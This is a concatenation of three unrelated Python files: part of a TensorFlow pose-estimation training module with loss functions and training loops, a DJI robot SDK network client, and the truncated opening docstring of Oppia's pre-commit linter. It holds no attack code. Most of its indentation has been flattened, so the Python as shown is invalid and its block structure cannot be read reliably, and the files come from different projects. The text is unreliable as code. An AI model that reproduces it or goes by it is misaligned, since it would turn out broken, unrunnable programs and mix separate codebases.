if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def train_model_vertex_pose(self, sess, train_op, loss, loss_cls, loss_vertex, loss_pose, learning_rate, max_iters, data_layer):
"""Network training loop."""
# add summary
# tf.summary.scalar('loss', loss)
# merged = tf.summary.merge_all()
# train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
        # initialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
# tf.train.write_graph(sess.graph_def, self.output_dir, 'model.pbtxt')
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, lr, _ = sess.run([loss, loss_cls, loss_vertex, loss_pose, learning_rate, train_op])
# train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_pose: %.4f, lr: %.8f, time: %.2f' %\
(iter+1, max_iters, loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, lr, timer.diff)
if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def train_model_vertex_pose_adapt(self, sess, train_op, loss, loss_cls, loss_vertex, loss_pose, \
loss_domain, label_domain, domain_label, learning_rate, max_iters, data_layer):
"""Network training loop."""
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
        # initialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, loss_domain_value, label_domain_value, domain_label_value, lr, _ = sess.run([loss, loss_cls, loss_vertex, loss_pose, loss_domain, label_domain, domain_label, learning_rate, train_op])
# train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_pose: %.4f, loss_domain: %.4f, lr: %.8f, time: %.2f' %\
(iter+1, max_iters, loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, loss_domain_value, lr, timer.diff)
print label_domain_value
print domain_label_value
if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def train_model_det(self, sess, train_op, loss, loss_rpn_cls, loss_rpn_box, loss_cls, loss_box, loss_pose, learning_rate, max_iters, data_layer):
"""Network training loop."""
# add summary
# tf.summary.scalar('loss', loss)
# merged = tf.summary.merge_all()
# train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
        # initialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
loss_value, loss_rpn_cls_value, loss_rpn_box_value, loss_cls_value, loss_box_value, loss_pose_value, lr, _ \
= sess.run([loss, loss_rpn_cls, loss_rpn_box, loss_cls, loss_box, loss_pose, learning_rate, train_op])
# train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_rpn_cls: %.4f, loss_rpn_box: %.4f, loss_cls: %.4f, loss_box: %.4f, loss_pose: %.4f, lr: %.8f, time: %.2f' %\
(iter+1, max_iters, loss_value, loss_rpn_cls_value, loss_rpn_box_value, loss_cls_value, loss_box_value, loss_pose_value, lr, timer.diff)
if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def get_training_roidb(imdb):
"""Returns a roidb (Region of Interest database) for use in training."""
if cfg.TRAIN.USE_FLIPPED:
print 'Appending horizontally-flipped training examples...'
imdb.append_flipped_images()
print 'done'
return imdb.roidb
def load_and_enqueue(sess, net, data_layer, coord):
iter = 0
while not coord.should_stop():
blobs = data_layer.forward(iter)
iter += 1
if cfg.INPUT == 'RGBD':
data_blob = blobs['data_image_color']
data_p_blob = blobs['data_image_depth']
elif cfg.INPUT == 'COLOR':
data_blob = blobs['data_image_color']
elif cfg.INPUT == 'DEPTH':
data_blob = blobs['data_image_depth']
elif cfg.INPUT == 'NORMAL':
data_blob = blobs['data_image_normal']
if cfg.TRAIN.SINGLE_FRAME:
if cfg.TRAIN.SEGMENTATION:
if cfg.INPUT == 'RGBD':
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
feed_dict={net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: 0.5, \
net.vertex_targets: blobs['data_vertex_targets'], net.vertex_weights: blobs['data_vertex_weights'], \
net.poses: blobs['data_pose'], net.extents: blobs['data_extents'], net.meta_data: blobs['data_meta_data']}
else:
feed_dict={net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: 0.5}
else:
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
feed_dict={net.data: data_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: 0.5, \
net.vertex_targets: blobs['data_vertex_targets'], net.vertex_weights: blobs['data_vertex_weights'], \
net.poses: blobs['data_pose'], net.extents: blobs['data_extents'], net.meta_data: blobs['data_meta_data'], \
net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry']}
else:
feed_dict={net.data: data_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: 0.5}
else:
if cfg.INPUT == 'RGBD':
feed_dict={net.data: data_blob, net.data_p: data_p_blob, net.im_info: blobs['data_im_info'], \
net.gt_boxes: blobs['data_gt_boxes'], net.poses: blobs['data_pose'], \
net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry'], net.keep_prob: 0.5}
else:
feed_dict={net.data: data_blob, net.im_info: blobs['data_im_info'], \
net.gt_boxes: blobs['data_gt_boxes'], net.poses: blobs['data_pose'], \
net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry'], net.keep_prob: 0.5}
else:
if cfg.INPUT == 'RGBD':
feed_dict={net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], \
net.depth: blobs['data_depth'], net.meta_data: blobs['data_meta_data'], \
net.state: blobs['data_state'], net.weights: blobs['data_weights'], net.points: blobs['data_points'], net.keep_prob: 0.5}
else:
feed_dict={net.data: data_blob, net.gt_label_2d: blobs['data_label'], \
net.depth: blobs['data_depth'], net.meta_data: blobs['data_meta_data'], \
net.state: blobs['data_state'], net.weights: blobs['data_weights'], net.points: blobs['data_points'], net.keep_prob: 0.5}
sess.run(net.enqueue_op, feed_dict=feed_dict)
def loss_cross_entropy(scores, labels):
"""
scores: a list of tensors [batch_size, height, width, num_classes]
labels: a list of tensors [batch_size, height, width, num_classes]
"""
with tf.name_scope('loss'):
loss = 0
for i in range(cfg.TRAIN.NUM_STEPS):
score = scores[i]
label = labels[i]
cross_entropy = -tf.reduce_sum(label * score, reduction_indices=[3])
loss += tf.div(tf.reduce_sum(cross_entropy), tf.reduce_sum(label))
loss /= cfg.TRAIN.NUM_STEPS
return loss
def loss_cross_entropy_single_frame(scores, labels):
"""
scores: a tensor [batch_size, height, width, num_classes]
labels: a tensor [batch_size, height, width, num_classes]
"""
with tf.name_scope('loss'):
cross_entropy = -tf.reduce_sum(labels * scores, reduction_indices=[3])
loss = tf.div(tf.reduce_sum(cross_entropy), tf.reduce_sum(labels)+1e-10)
return loss
def loss_quaternion(pose_pred, pose_targets, pose_weights):
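    # the per-sample distance 1 - <q_pred, q_target>^2 is zero for identical
    # orientations and is invariant to the sign ambiguity of unit quaternions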
with tf.name_scope('loss'):
distances = 1 - tf.square( tf.reduce_sum(tf.multiply(pose_pred, pose_targets), reduction_indices=[1]) )
weights = tf.reduce_mean(pose_weights, reduction_indices=[1])
loss = tf.div( tf.reduce_sum(tf.multiply(weights, distances)), tf.reduce_sum(weights)+1e-10 )
return loss
def train_net(network, imdb, roidb, output_dir, pretrained_model=None, pretrained_ckpt=None, max_iters=40000):
"""Train a Fast R-CNN network."""
loss_regu = tf.add_n(tf.losses.get_regularization_losses(), 'regu')
if cfg.TRAIN.SINGLE_FRAME:
# classification loss
if cfg.NETWORK == 'FCN8VGG':
scores = network.prob
labels = network.gt_label_2d_queue
loss = loss_cross_entropy_single_frame(scores, labels) + loss_regu
else:
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
scores = network.get_output('prob')
labels = network.get_output('gt_label_weight')
loss_cls = loss_cross_entropy_single_frame(scores, labels)
vertex_pred = network.get_output('vertex_pred')
vertex_targets = network.get_output('vertex_targets')
vertex_weights = network.get_output('vertex_weights')
# loss_vertex = tf.div( tf.reduce_sum(tf.multiply(vertex_weights, tf.abs(tf.subtract(vertex_pred, vertex_targets)))), tf.reduce_sum(vertex_weights) + 1e-10 )
loss_vertex = cfg.TRAIN.VERTEX_W * smooth_l1_loss_vertex(vertex_pred, vertex_targets, vertex_weights)
if cfg.TRAIN.POSE_REG:
# pose_pred = network.get_output('poses_pred')
# pose_targets = network.get_output('poses_target')
# pose_weights = network.get_output('poses_weight')
# loss_pose = cfg.TRAIN.POSE_W * tf.div( tf.reduce_sum(tf.multiply(pose_weights, tf.abs(tf.subtract(pose_pred, pose_targets)))), tf.reduce_sum(pose_weights) )
# loss_pose = cfg.TRAIN.POSE_W * loss_quaternion(pose_pred, pose_targets, pose_weights)
loss_pose = cfg.TRAIN.POSE_W * network.get_output('loss_pose')[0]
if cfg.TRAIN.ADAPT:
domain_score = network.get_output("domain_score")
domain_label = network.get_output("domain_label")
label_domain = network.get_output("label_domain")
loss_domain = cfg.TRAIN.ADAPT_WEIGHT * tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=domain_score, labels=label_domain))
loss = loss_cls + loss_vertex + loss_pose + loss_domain + loss_regu
else:
loss = loss_cls + loss_vertex + loss_pose + loss_regu
else:
loss = loss_cls + loss_vertex + loss_regu
else:
scores = network.get_output('prob')
labels = network.get_output('gt_label_weight')
loss = loss_cross_entropy_single_frame(scores, labels) + loss_regu
else:
# classification loss
scores = network.get_output('outputs')
labels = network.get_output('labels_gt_2d')
loss = loss_cross_entropy(scores, labels) + loss_regu
# optimizer
global_step = tf.Variable(0, trainable=False)
starter_learning_rate = cfg.TRAIN.LEARNING_RATE
learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
cfg.TRAIN.STEPSIZE, 0.1, staircase=True)
momentum = cfg.TRAIN.MOMENTUM
train_op = tf.train.MomentumOptimizer(learning_rate, momentum).minimize(loss, global_step=global_step)
#config = tf.ConfigProto()
#config.gpu_options.per_process_gpu_memory_fraction = 0.85
#config.gpu_options.allow_growth = True
#with tf.Session(config=config) as sess:
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
# data layer
if cfg.TRAIN.SINGLE_FRAME:
data_layer = GtSynthesizeLayer(roidb, imdb.num_classes, imdb._extents, imdb._points_all, imdb._symmetry, imdb.cache_path, imdb.name, imdb.data_queue, cfg.CAD, cfg.POSE)
else:
data_layer = GtDataLayer(roidb, imdb.num_classes)
sw = SolverWrapper(sess, network, imdb, roidb, output_dir, pretrained_model=pretrained_model, pretrained_ckpt=pretrained_ckpt)
print 'Solving...'
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
if cfg.TRAIN.POSE_REG:
if cfg.TRAIN.ADAPT:
sw.train_model_vertex_pose_adapt(sess, train_op, loss, loss_cls, loss_vertex, loss_pose, \
loss_domain, label_domain, domain_label, learning_rate, max_iters, data_layer)
else:
sw.train_model_vertex_pose(sess, train_op, loss, loss_cls, loss_vertex, loss_pose, learning_rate, max_iters, data_layer)
else:
sw.train_model_vertex(sess, train_op, loss, loss_cls, loss_vertex, loss_regu, learning_rate, max_iters, data_layer)
else:
sw.train_model(sess, train_op, loss, learning_rate, max_iters, data_layer)
print 'done solving'
def smooth_l1_loss_vertex(vertex_pred, vertex_targets, vertex_weights, sigma=1.0):
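    # elementwise smooth L1 (Huber) loss on the weighted residual d:
    #   0.5 * sigma^2 * d^2    if |d| < 1 / sigma^2
    #   |d| - 0.5 / sigma^2    otherwise
    # normalized by the sum of the vertex weights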
sigma_2 = sigma ** 2
vertex_diff = vertex_pred - vertex_targets
diff = tf.multiply(vertex_weights, vertex_diff)
abs_diff = tf.abs(diff)
smoothL1_sign = tf.stop_gradient(tf.to_float(tf.less(abs_diff, 1. / sigma_2)))
in_loss = tf.pow(diff, 2) * (sigma_2 / 2.) * smoothL1_sign \
+ (abs_diff - (0.5 / sigma_2)) * (1. - smoothL1_sign)
loss = tf.div( tf.reduce_sum(in_loss), tf.reduce_sum(vertex_weights) + 1e-10 )
return loss
def smooth_l1_loss(bbox_pred, bbox_targets, bbox_inside_weights, bbox_outside_weights, sigma=1.0, dim=[1]):
sigma_2 = sigma ** 2
box_diff = bbox_pred - bbox_targets
in_box_diff = bbox_inside_weights * box_diff
abs_in_box_diff = tf.abs(in_box_diff)
smoothL1_sign = tf.stop_gradient(tf.to_float(tf.less(abs_in_box_diff, 1. / sigma_2)))
in_loss_box = tf.pow(in_box_diff, 2) * (sigma_2 / 2.) * smoothL1_sign \
+ (abs_in_box_diff - (0.5 / sigma_2)) * (1. - smoothL1_sign)
out_loss_box = bbox_outside_weights * in_loss_box
loss_box = tf.reduce_mean(tf.reduce_sum(
out_loss_box,
axis=dim
))
return loss_box
def train_net_det(network, imdb, roidb, output_dir, pretrained_model=None, pretrained_ckpt=None, max_iters=40000):
"""Train a Fast R-CNN network."""
loss_regu = tf.add_n(tf.losses.get_regularization_losses(), 'regu')
# RPN, class loss
rpn_cls_score = tf.reshape(network.get_output('rpn_cls_score_reshape'), [-1, 2])
rpn_label = tf.reshape(network.get_output('rpn_labels'), [-1])
rpn_select = tf.where(tf.not_equal(rpn_label, -1))
rpn_cls_score = tf.reshape(tf.gather(rpn_cls_score, rpn_select), [-1, 2])
rpn_label = tf.reshape(tf.gather(rpn_label, rpn_select), [-1])
loss_rpn_cls = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=rpn_cls_score, labels=rpn_label))
# RPN, bbox loss
rpn_bbox_pred = network.get_output('rpn_bbox_pred')
rpn_bbox_targets = network.get_output('rpn_bbox_targets')
rpn_bbox_inside_weights = network.get_output('rpn_bbox_inside_weights')
rpn_bbox_outside_weights = network.get_output('rpn_bbox_outside_weights')
loss_rpn_box = smooth_l1_loss(rpn_bbox_pred, rpn_bbox_targets, rpn_bbox_inside_weights,
rpn_bbox_outside_weights, sigma=3.0, dim=[1, 2, 3])
# RCNN, class loss
cls_score = network.get_output("cls_score")
label = tf.reshape(network.get_output("labels"), [-1])
loss_cls = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=cls_score, labels=label))
# RCNN, bbox loss
bbox_pred = network.get_output('bbox_pred')
bbox_targets = network.get_output('bbox_targets')
bbox_inside_weights = network.get_output('bbox_inside_weights')
bbox_outside_weights = network.get_output('bbox_outside_weights')
loss_box = smooth_l1_loss(bbox_pred, bbox_targets, bbox_inside_weights, bbox_outside_weights)
# pose regression loss
loss_pose = network.get_output('loss_pose')[0]
# add losses
loss = loss_rpn_cls + loss_rpn_box + loss_cls + loss_box + loss_pose + loss_regu
# optimizer
global_step = tf.Variable(0, trainable=False)
starter_learning_rate = cfg.TRAIN.LEARNING_RATE
learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
cfg.TRAIN.STEPSIZE, 0.1, staircase=True)
momentum = cfg.TRAIN.MOMENTUM
train_op = tf.train.MomentumOptimizer(learning_rate, momentum).minimize(loss, global_step=global_step)
#config = tf.ConfigProto()
#config.gpu_options.per_process_gpu_memory_fraction = 0.85
#config.gpu_options.allow_growth = True
#with tf.Session(config=config) as sess:
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
sw = SolverWrapper(sess, network, imdb, roidb, output_dir, pretrained_model=pretrained_model, pretrained_ckpt=pretrained_ckpt)
# thread to load data
data_layer = GtSynthesizeLayer(roidb, imdb.num_classes, imdb._extents, imdb._points_all, imdb._symmetry, imdb.cache_path, imdb.name, cfg.CAD, cfg.POSE)
print 'Solving...'
sw.train_model_det(sess, train_op, loss, loss_rpn_cls, loss_rpn_box, loss_cls, loss_box, loss_pose, learning_rate, max_iters, data_layer)
print 'done solving'
|
client.py
|
# -*-coding:utf-8-*-
# Copyright (c) 2020 DJI.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import binascii
from . import conn
from . import protocol
from . import logger
from . import event
from . import config
CLIENT_MAX_EVENT_NUM = 16
class EventIdentify(object):
def __init__(self):
self._valid = False
self._ident = None
self._event = threading.Event()
class MsgHandler:
def __init__(self, proto_data=None, req_cb=None, ack_cb=None):
self._proto_data = proto_data
self._req_cb = req_cb
self._ack_cb = ack_cb
@property
def proto_data(self):
return self._proto_data
@staticmethod
def make_dict_key(cmd_set, cmd_id):
return cmd_set * 256 + cmd_id
def dict_key(self):
logger.debug('MsgHandler: dict_key, isinstance:', isinstance(self._proto_data, protocol.ProtoData))
if self._proto_data:
return self.make_dict_key(self.proto_data._cmdset, self.proto_data._cmdid)
return None
class Client(object):
# host is int, index is int.
def __init__(self, host=0, index=0, connect=None):
self._host = host
self._index = index
self._conn = connect
if connect is None:
try:
self._conn = conn.Connection(config.ROBOT_DEFAULT_LOCAL_WIFI_ADDR,
config.ROBOT_DEFAULT_WIFI_ADDR,
protocol=config.DEFAULT_PROTO_TYPE)
except Exception as e:
logger.error('Client: __init__, create Connection, exception: {0}'.format(e))
self._conn = None
self._has_sent = 0
self._has_recv = 0
self._unpack_failed = 0
self._dispatcher = event.Dispatcher()
self._handler_dict = {}
self._wait_ack_list = {}
self._wait_ack_mutex = threading.Lock()
self._event_list = []
self._thread = None
self._running = False
def __del__(self):
self.stop()
@property
def remote_addr(self):
return self._conn.target_addr if self._conn else None
def add_handler(self, obj, name, f):
self._dispatcher.add_handler(obj, name, f)
def remove_handler(self, name):
self._dispatcher.remove_handler(name)
def initialize(self):
if not self._conn:
logger.warning("Client: initialize, no connections, init connections first.")
return False
for i in range(0, CLIENT_MAX_EVENT_NUM):
ident = EventIdentify()
self._event_list.append(ident)
try:
self._conn.create()
except Exception as e:
raise e
return True
@property
def hostbyte(self):
return protocol.host2byte(self._host, self._index)
def start(self):
try:
result = self.initialize()
if not result:
return False
self._thread = threading.Thread(target=self._recv_task)
self._thread.start()
except Exception as e:
raise e
def stop(self):
if self._thread and self._thread.is_alive():
self._running = False
proto = protocol.ProtoGetVersion()
msg = protocol.Msg(self.hostbyte, self.hostbyte, proto)
self._conn.send_self(msg.pack())
self._thread.join()
if self._conn:
self._conn.close()
def send_msg(self, msg):
data = msg.pack()
logger.debug("Client: send_msg, msg {0} {1}".format(self._has_sent, msg))
logger.debug("Client: send_msg, cmset:{0:2x}, cmdid:{1:2x}, {2}".format(msg.cmdset, msg.cmdid,
binascii.hexlify(data)))
self._has_sent += 1
self.send(data)
def send_sync_msg(self, msg, callback=None, timeout=3.0):
if not self._running:
logger.error("Client: send_sync_msg, client recv_task is not running.")
return None
if msg._need_ack > 0:
evt = self._ack_register_identify(msg)
if evt is None:
logger.error("Client: send_sync_msg, ack_register failed.")
return None
self.send_msg(msg)
evt._event.wait(timeout)
if not evt._event.isSet():
logger.error("Client: send_sync_msg wait msg receiver:{0}, cmdset:0x{1:02x}, cmdid:0x{2:02x} \
timeout!".format(msg.receiver, msg.cmdset, msg.cmdid))
evt._valid = False
return None
resp_msg = self._ack_unregister_identify(evt._ident)
evt._valid = False
if resp_msg is None:
logger.error("Client, send_sync_msg, get resp msg failed.")
else:
if isinstance(resp_msg, protocol.Msg):
try:
resp_msg.unpack_protocol()
if callback:
callback(resp_msg)
except Exception as e:
self._unpack_failed += 1
logger.warning("Client: send_sync_msg, resp_msg {0:d} cmdset:0x{1:02x}, cmdid:0x{2:02x}, "
"e {3}".format(self._has_sent, resp_msg.cmdset, resp_msg.cmdid, format(e)))
return None
else:
logger.warning("Client: send_sync_msg, has_sent:{0} resp_msg:{1}.".format(
self._has_sent, resp_msg))
return None
return resp_msg
else:
self.send_msg(msg)
def resp_msg(self, msg):
msg._sender, msg._receiver = msg._receiver, msg._sender
msg._need_ack = 0
msg._is_ack = True
data = msg.pack(True)
self._has_sent += 1
self.send(data)
def send(self, data):
try:
self._conn.send(data)
except Exception as e:
logger.warning("Client: send, exception {0}".format(str(e)))
def send_async_msg(self, msg):
if not self._running:
logger.error("Client: send_async_msg, client recv_task is not running.")
return None
msg._need_ack = 0
return self.send_msg(msg)
def is_ready(self):
return self._has_recv > 0
def _recv_task(self):
self._running = True
logger.info("Client: recv_task, Start to Recving data...")
while self._running:
msg = self._conn.recv()
if not self._running:
break
if msg is None:
logger.warning("Client: _recv_task, recv msg is None, skip.")
continue
logger.info("Client: recv_msg, {0}".format(msg))
self._has_recv += 1
self._dispatch_to_send_sync(msg)
self._dispatch_to_callback(msg)
if self._dispatcher:
self._dispatcher.dispatch(msg)
self._running = False
def _dispatch_to_send_sync(self, msg):
if msg.is_ack:
logger.debug("Client: dispatch_to_send_sync, {0} cmdset:{1} cmdid:{2}".format(
self._has_recv, hex(msg._cmdset), hex(msg._cmdid)))
ident = self._make_ack_identify(msg)
self._wait_ack_mutex.acquire()
if ident in self._wait_ack_list.keys():
for i, evt in enumerate(self._event_list):
if evt._ident == ident and evt._valid:
self._wait_ack_list[ident] = msg
evt._event.set()
else:
logger.debug("Client: dispatch_to_send_sync, ident:{0} is not in wait_ack_list {1}".format(
ident, self._wait_ack_list))
self._wait_ack_mutex.release()
def _dispatch_to_callback(self, msg):
if msg._is_ack:
key = MsgHandler.make_dict_key(msg.cmdset, msg.cmdid)
if key in self._handler_dict.keys():
self._handler_dict[key]._ack_cb(self, msg)
else:
logger.debug("Client: dispatch_to_callback, msg cmdset:{0:2x}, cmdid:{1:2x} is not define ack \
handler".format(msg.cmdset, msg.cmdid))
else:
key = MsgHandler.make_dict_key(msg.cmdset, msg.cmdid)
if key in self._handler_dict.keys():
self._handler_dict[key]._req_cb(self, msg)
else:
logger.debug("Client: _dispatch_to_callback, cmdset:{0}, cmdid:{1} is not define req handler".format(
hex(msg.cmdset), hex(msg.cmdid)))
@staticmethod
def _make_ack_identify(msg):
if msg.is_ack:
return str(msg._sender) + str(hex(msg.cmdset)) + str(hex(msg.cmdid)) + str(msg._seq_id)
else:
return str(msg._receiver) + str(hex(msg.cmdset)) + str(hex(msg.cmdid)) + str(msg._seq_id)
def _ack_register_identify(self, msg):
self._wait_ack_mutex.acquire()
ident = self._make_ack_identify(msg)
self._wait_ack_list[ident] = 1
self._wait_ack_mutex.release()
evt = None
for i, evt_ident in enumerate(self._event_list):
if not evt_ident._valid:
evt = evt_ident
break
if evt is None:
logger.error("Client: event list is run out.")
return None
evt._valid = True
evt._ident = ident
evt._event.clear()
return evt
def _ack_unregister_identify(self, identify):
try:
self._wait_ack_mutex.acquire()
if identify in self._wait_ack_list.keys():
return self._wait_ack_list.pop(identify)
else:
logger.warning("can not find ident:{0} in wait_ack_list.".format(identify))
return None
finally:
self._wait_ack_mutex.release()
def add_msg_handler(self, handler):
key = handler.dict_key()
if key:
self._handler_dict[key] = handler
class TextClient(object):
def __init__(self, conf):
self._conn = conn.Connection(conf.default_sdk_addr, conf.default_robot_addr, conf.cmd_proto)
self._thread = threading.Thread(target=self._recv_task)
self._running = False
self._event = threading.Event()
self._dispatcher = event.Dispatcher()
self._has_cmd_wait_ack = False
self._has_sent = 0
self._has_recv = 0
self._wait_ack_mutex = threading.Lock()
def initialize(self):
try:
self._conn.create()
except Exception as e:
raise e
return True
def start(self):
self.initialize()
self._thread.start()
def stop(self):
self._running = False
self._thread.join()
self._conn.close()
def check_is_dds_msg(self, msg):
return protocol.TextMsg.IS_DDS_FLAG in msg.get_buf()
def _recv_task(self):
self._running = True
logger.info("TextClient: _recv_task, Start to Recving data...")
while self._running:
resp = self._conn.recv()
if not self._running:
break
if resp is None:
logger.warning("Client: _recv_task, recv resp is None, skip.")
continue
if not self.check_is_dds_msg(resp):
logger.info("TextClient: _recv_task, resp: {0}".format(resp))
else:
logger.debug("TextClient: recv_resp, recv resp {0}".format(resp))
self._wait_ack_mutex.acquire()
if self._has_cmd_wait_ack and not self.check_is_dds_msg(resp):
logger.debug("TexClient: call send_sync dispatcher: {0}".format(resp))
self._dispatch_to_send_sync(resp)
self._wait_ack_mutex.release()
if self._dispatcher:
self._dispatcher.dispatch(resp)
logger.info("_recv_task: quit.")
def send(self, text):
logger.debug("Client: time delay test, send time")
logger.info("TextClient: send_msg: {0}".format(text))
try:
self._conn.send(text.encode('utf-8'))
except Exception as e:
logger.warning("TexClient: send_async_text, exception {0}".format(str(e)))
return False
return True
def send_sync_msg(self, msg, callback=None, timeout=10):
        if not self._running:
            logger.error("TextClient: send_sync_msg, client recv_task is not running.")
            return None
self._wait_ack_mutex.acquire()
self._has_cmd_wait_ack = True
self.send_msg(msg)
self._wait_ack_mutex.release()
self._event.wait(timeout)
if self._event.isSet():
self._event.clear()
self._wait_ack_mutex.acquire()
self._has_cmd_wait_ack = False
self._wait_ack_mutex.release()
return self._resp
else:
logger.warning("TextClient: send_sync_text, failed, timeout.")
return None
def send_async_msg(self, msg):
if not self._running:
logger.error("TextClient: send_async_msg, client recv_task is not running.")
return None
return self.send_msg(msg)
def send_msg(self, msg):
data = msg.pack()
self.send(data)
self._has_sent += 1
def add_handler(self, obj, name, f):
self._dispatcher.add_handler(obj, name, f)
def remove_handler(self, name):
self._dispatcher.remove_handler(name)
def _dispatch_to_send_sync(self, msg):
logger.debug("TextClient: _dispatch_to_send_sync, msg {0}".format(msg))
self._resp = msg
self._event.set()
def _make_ack_identify(self, msg):
return msg
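# A minimal usage sketch (illustrative only; assumes a reachable robot and the
# default connection settings baked into Client, and mirrors the message
# construction used in Client.stop()):
#
#     client = Client()
#     client.start()
#     proto = protocol.ProtoGetVersion()
#     msg = protocol.Msg(client.hostbyte, client.hostbyte, proto)
#     resp = client.send_sync_msg(msg)
#     client.stop()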
|
pre_commit_linter.py
|
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pre-commit script for Oppia.
This script lints Python and JavaScript code, and prints a
list of lint errors to the terminal. If the directory path is passed,
it will lint all Python and JavaScript files in that directory; otherwise,
it will only lint files that have been touched in this commit.
This script ignores all filepaths contained within .eslintignore.
=====================
CUSTOMIZATION OPTIONS
=====================
1. To lint only files that have been touched in this commit
python -m scripts.linters.pre_commit_linter
2. To lint all files in the folder or to lint just a specific file
python -m scripts.linters.pre_commit_linter --path filepath
3. To lint a specific list of files. Separate filepaths by spaces
